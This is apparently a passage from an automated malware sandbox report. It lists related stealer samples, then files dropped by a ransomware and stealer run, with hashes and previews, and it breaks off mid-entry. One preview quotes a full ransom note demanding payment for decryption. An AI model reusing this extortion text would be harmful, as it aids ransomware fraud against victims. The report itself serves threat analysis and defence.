                                                                                                                                                                                                            Rechnung.pdf.lnkGet hashmaliciousVidarBrowse
                                                                                                                                                                                                              Esp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                ir95invGki.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                      yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        EcNghZJd5O.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                          PIa51EkBL7.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            G2KdVscPB4.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              ofrAxT2J4j.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                Rechnung.pdf.lnkGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  Esp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    ir95invGki.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse

                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                      C:\$WinREAgent\Scratch\_README.txt

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1381
                                                                                                                                                                                                                                      Entropy (8bit):4.900414759348837
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNBamFRqrs6314kA+GT/kF5M2/kJw3RJv:WZHfv0pfNAU5WEYNBaPs41rDGT0f/kiN
                                                                                                                                                                                                                                      MD5:743DE536D4049809F770A31EBDF940F0
                                                                                                                                                                                                                                      SHA1:EF9581CB6E28BE4F601D51BA72AE4B2CAE50088C
                                                                                                                                                                                                                                      SHA-256:BA953BD249D95AAB22C35D969A191DBE4568AEB6A7612EE747489C4132F208B0
                                                                                                                                                                                                                                      SHA-512:793B1BE5D41D03C32C20DBB055E50B7E7295123E7EDD9F2BD81C4A800502FD8D3EF2AE6BA83C0E0AED037F20993BD9DD2695AB6E2935FB870A414667A531F9B2
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

                                                                                                                                                                                                                                      C:\$WinREAgent\_README.txt

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1381
                                                                                                                                                                                                                                      Entropy (8bit):4.900414759348837
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNBamFRqrs6314kA+GT/kF5M2/kJw3RJv:WZHfv0pfNAU5WEYNBaPs41rDGT0f/kiN
                                                                                                                                                                                                                                      MD5:743DE536D4049809F770A31EBDF940F0
                                                                                                                                                                                                                                      SHA1:EF9581CB6E28BE4F601D51BA72AE4B2CAE50088C
                                                                                                                                                                                                                                      SHA-256:BA953BD249D95AAB22C35D969A191DBE4568AEB6A7612EE747489C4132F208B0
                                                                                                                                                                                                                                      SHA-512:793B1BE5D41D03C32C20DBB055E50B7E7295123E7EDD9F2BD81C4A800502FD8D3EF2AE6BA83C0E0AED037F20993BD9DD2695AB6E2935FB870A414667A531F9B2
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

                                                                                                                                                                                                                                      C:\ProgramData\AAEHJEGIIDAECAAKEBKF

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\CBAFIDAE

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\CFIJEBFC

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.1239949490932863
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\CGHCFBAAAFHJDGCBFIIJDBGDHJ

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\DHDAKFCG

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\GDGDHJJDGHCAAAKEHIJKEBAEGH

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                      Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                                                      MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                                                      SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                                                      SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                                                      SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\GIJKKKFCFHCFIECBGDHIDHIEGI

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                                                                                                      Entropy (8bit):0.0357803477377646
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                                                                      MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                                                                      SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                                                                      SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                                                                      SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\HCBFIJJECFIEBGDGCFIJ

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                      SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                      SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                      SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\HCFCFHJDBKJKEBFHJEHIIIDBGH

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\IIEBKJEC

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                      MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                      SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                      SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                      SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_c21224191a167f50d0fc77956927dc29a8d71181_f78a65ed_a40b8cdc-c3d3-471a-9ba9-1c6c39b34ed4\Report.wer

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):2.319651815573198
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:2lC14Wbk7jAWyY9olRb5ceozuiFsY4lO8k:2lHWbk7j6YyjbeeozuiFsY4lO8
                                                                                                                                                                                                                                      MD5:9B160A87AE4598C439B159102E2BAE3C
                                                                                                                                                                                                                                      SHA1:6FE31DEE438F0620A9B8461486CCEFEC541B57D6
                                                                                                                                                                                                                                      SHA-256:F84CE73E37915C9DC34D6DD07641EA7362519734A7EB599E6400688562B7F115
                                                                                                                                                                                                                                      SHA-512:E1F4DACE74F9A266DEA1F581A9F36B75A29D6C2B1EC7A2A29AB2D67B9B477C2CC9033D09BF9F6BD3F64A7149D90A1FA0C124EE83959B64C7563C586ED5DBBFC8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.6.1.1.8.2.9.2.6.7.9.7.2.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.0.b.8.c.d.c.-.c.3.d.3.-.4.7.1.a.-.9.b.a.9.-.1.c.6.c.3.9.b.3.4.e.d.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.6.a.f.5.a.e.-.d.7.a.6.-.4.4.b.b.-.b.4.2.2.-.7.e.7.8.e.8.7.b.a.0.d.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.a.4.-.0.0.0.1.-.0.0.1.5.-.a.a.f.6.-.f.9.b.8.2.3.8.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB5A9.tmp.dmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 17 streams, CheckSum 0x00000004, Thu Mar 28 16:51:33 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1137040
                                                                                                                                                                                                                                      Entropy (8bit):1.3525352757993936
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:wi1443KshEeJzhIobrP6r9yDDy97CAlqf9Q2jKgyFrLAZUn9kXGromjMMcYtFbP8:wi144as6qvtAEfuWjW9zLicFbeX
                                                                                                                                                                                                                                      MD5:DA58784CA212328B2FEB245236C060A5
                                                                                                                                                                                                                                      SHA1:C868EBB83D2C02B5B3B7023FE271D1D6F125ED24
                                                                                                                                                                                                                                      SHA-256:805B65982837657E47F8AAA5B50CEE5C1FE100FD1F68277C83E73E245F7B1DE8
                                                                                                                                                                                                                                      SHA-512:810E80CD25D892D3E92471A18859EA3725E5A061E346AEC93026D54DD13FBB4E80957B52E474256CEB413E1A5DA7C1EBAFAD013A5A01E1EE6EBAF3D116D25853
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MDMP..a..... ..........f............4... .......pl..`.................................$9..........x.......8...........T...$........y......................................4...............................................................................eJ......P.......Lw......................T...........*..f............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERBABB.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10826
                                                                                                                                                                                                                                      Entropy (8bit):3.697247613829721
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJurW46Yws43gmfqipBprE89bLN4Cbf0Z5m:R6lXJr46Ys3gmfqipdLyCbfT
                                                                                                                                                                                                                                      MD5:5CF020AEE7FA082627920487B16424DF
                                                                                                                                                                                                                                      SHA1:48FEAF07BA1FB467C063C3659A254D19889085FC
                                                                                                                                                                                                                                      SHA-256:2DCAF0FFE76FC1F973108F3E49965D3A18AEEA80E1709363AFAA0BC3449A684A
                                                                                                                                                                                                                                      SHA-512:1DB9645480AAC7F4DCDDBB1C648E7521104632649E4312C0E583EE7E16F636103471C68BE128552E9E2566FEA65C5397D1258A4FBF7BD08DBBAB65721B08BC36
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.0.4.<./.P.i.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB39.tmp.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
